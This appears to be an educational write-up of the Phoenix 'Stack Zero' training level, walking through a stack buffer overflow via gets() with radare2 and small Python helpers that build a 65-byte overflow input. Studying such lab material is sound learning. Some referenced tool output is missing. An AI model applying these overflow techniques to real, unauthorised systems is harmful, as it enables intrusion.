Phoenix is a virtual machine that can be obtained from exploit.education. It provides an educational environment in which one can practice their exploitation skills. For additional details, visit the website.
For those reluctant to download an unknown virtual machine, Debian packages are also provided.
Stack Zero, which is the first level, introduces the legendary stack-based buffer overflow.
In order to get a glimpse of what the binary is all about, rabin2 comes to the rescue:
What can be gathered from the above info are the following:
The binary is a 32-bit Linux ELF (arch x86, bintype elf, bits 32, class ELF32, os linux..).
The endianness is little (endian little).
It wasn't compiled with the Stack Smashing Protector (SSP) compiler feature (canary false), so a stack-based buffer overflow will not be detected at run time.
It wasn't built with Data Execution Prevention (DEP), also known as No-Execute (NX) (nx false), so the stack is executable and shellcode placed on it can run.
It wasn't linked with RELocation Read-Only (relro no), which means that the Global Offset Table (GOT) stays writable at run time and its entries can be overwritten. Note that loading the binary and all of its dependencies at randomized locations within virtual memory on each execution is a separate mitigation (PIE together with ASLR); it is that feature which hinders Return Oriented Programming a lot.
Considering the above information, if the binary accepts input via environment variables, arguments or STDIN, it can be exploited.
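The checklist above can be automated with a few lines of python3. This is only a minimal sketch: it assumes the info is available as plain "key value" lines, and the sample text contains just the fields quoted in the list above rather than the tool's complete output. The function names are hypothetical.

```python
def parse_info(text):
    """Turn whitespace-separated 'key value' lines into a dict."""
    info = {}
    for line in text.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2:
            info[parts[0]] = parts[1].strip()
    return info


def missing_mitigations(info):
    """List the protections that the parsed info reports as absent."""
    missing = []
    if info.get("canary") == "false":
        missing.append("stack canary (SSP)")
    if info.get("nx") == "false":
        missing.append("NX/DEP")
    if info.get("relro") == "no":
        missing.append("RELRO")
    return missing


# Illustrative sample: only the fields mentioned in the text, not real tool output.
SAMPLE = """\
arch     x86
bintype  elf
bits     32
class    ELF32
endian   little
os       linux
canary   false
nx       false
relro    no
"""

if __name__ == "__main__":
    for name in missing_mitigations(parse_info(SAMPLE)):
        print("missing:", name)
```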
To disassemble the binary, r2 can be used.
It is not recommended to use aaa or -A as an argument when opening a binary, because the analysis could take a really long time if that binary is big. Using radare2, one needs to know which analysis is most beneficial at every stage of reverse engineering a binary. In this particular case, aas, which uses binary header information to find public functions, is good enough.
There are a couple of options available to view the disassembly at a particular address. One is to seek to that address with s and then disassemble the current function with pdf, or open the Visual Graph with VV.
Another cool command is agf, which outputs the basic blocks function graph.
There are a few things that can be seen from the disassembled main function:
There are two local variables:
var_4ch, which is the buffer where the input from STDIN is saved. It has a size of 0x4c-0xc=0x40 (64 bytes in decimal).
var_ch, which is a 32-bit integer.
There is a call to gets with var_4ch as an argument at 0x080484e4. gets does not restrict the number of bytes that are read and is, thus, vulnerable to stack-based buffer overflow.
The objective is to change the value of var_ch, which is tested at address 0x080484ef.
With that in mind, the input must be at least 65 bytes long to exploit this: 64 bytes fill the buffer and at least one more byte is needed to overwrite the value of var_ch.
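To make the arithmetic concrete, the following python3 sketch models the relevant part of the stack frame as a byte array: 64 bytes for the buffer at ebp-0x4c, immediately followed by the 4 bytes of var_ch at ebp-0xc. It is a simplified model and not the real process memory. It assumes that var_ch starts out as zero, and the helper name simulate_gets is hypothetical.

```python
import struct

BUF_OFFSET = 0x4C                    # buffer starts at ebp-0x4c
VAR_OFFSET = 0x0C                    # var_ch lives at ebp-0xc
BUF_SIZE = BUF_OFFSET - VAR_OFFSET   # 0x40 = 64 bytes


def simulate_gets(user_input):
    """Copy input into a fake frame without bounds checks and return var_ch."""
    frame = bytearray(BUF_SIZE + 4)  # buffer + var_ch, all zero (assumption)
    data = user_input + b"\x00"      # gets stores a terminating NUL byte
    data = data[:len(frame)]         # the model ends right after var_ch
    frame[:len(data)] = data
    # var_ch is a 32-bit integer stored in little-endian byte order
    (var_ch,) = struct.unpack_from("<I", frame, BUF_SIZE)
    return var_ch


if __name__ == "__main__":
    for size in (64, 65, 68):
        value = simulate_gets(b"A" * size)
        print(f"{size} bytes of input -> var_ch = {value:#010x}")
```

With 64 bytes only the terminating NUL lands on var_ch, which leaves a zero value unchanged; the 65th byte is the first one that actually modifies it.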
Before opening the binary in debugger mode using radare2, a rarun2 profile is needed so that the binary can read its input from a file. In order to do that, a file needs to be created with the following contents:
Replace /dev/pts/0 with the output of the command tty and ./pattern with the full path to the file that contains the input to be read by the binary.
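For convenience, the profile can also be generated with python3. The sketch below assumes that the profile only needs the stdio and stdin directives, matching the two values mentioned above. The function name and the output file name profile.rr2 are hypothetical.

```python
def make_rarun2_profile(tty, input_file):
    """Return the text of a rarun2 profile that redirects stdio and stdin."""
    lines = [
        "#!/usr/bin/rarun2",
        f"stdio={tty}",          # terminal to attach to, as printed by `tty`
        f"stdin={input_file}",   # file whose contents are fed to the binary
    ]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    # Both values are placeholders and must be adapted to the local setup.
    profile = make_rarun2_profile("/dev/pts/0", "./pattern")
    with open("profile.rr2", "w") as handle:
        handle.write(profile)
    print(profile, end="")
```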
One more thing that is essential is a file that contains the input. For that, python3 is going to be used.
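One possible way to create that file is sketched below. It assumes a 64-byte buffer followed directly by the variable to overwrite, and it appends a newline because gets stops reading at the end of a line. The function name, the fill byte and the default file name are arbitrary choices.

```python
from pathlib import Path


def write_pattern(path, buf_size=64, extra=1, fill=b"A"):
    """Write buf_size + extra fill bytes plus a newline to path."""
    payload = fill * (buf_size + extra) + b"\n"
    Path(path).write_bytes(payload)
    return payload


if __name__ == "__main__":
    data = write_pattern("pattern")
    print(f"wrote {len(data)} bytes to ./pattern")
```

Increasing extra to 4 overwrites all four bytes of the integer instead of only its lowest byte.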
Now, the binary can be debugged as follows:
Note that when debugging with radare2, the visual panels are really awesome! They can be accessed with v! or V!.
To showcase that the binary is indeed vulnerable, a breakpoint before the call to gets is necessary. That can be done by simply executing db followed by the address and then dc to continue until the breakpoint is hit.
Before calling gets, it is a good idea to check the value of var_ch. This can be accomplished by first checking the value of the ebp register, via dr, and then viewing the hexdump at address ebp-0xc, via px/xw.
To execute the next instruction by stepping over, simply use dso.
As shown above, the value of var_ch is indeed overwritten.
Conclusion
The binary was not compiled with the features that would otherwise mitigate stack-based buffer overflows, and it contains a call to gets, which does not account for the number of bytes read from STDIN. As such, one only needs to take the size of the buffer into account and input more bytes than it can actually hold so that the buffer overflows into the adjacent variable.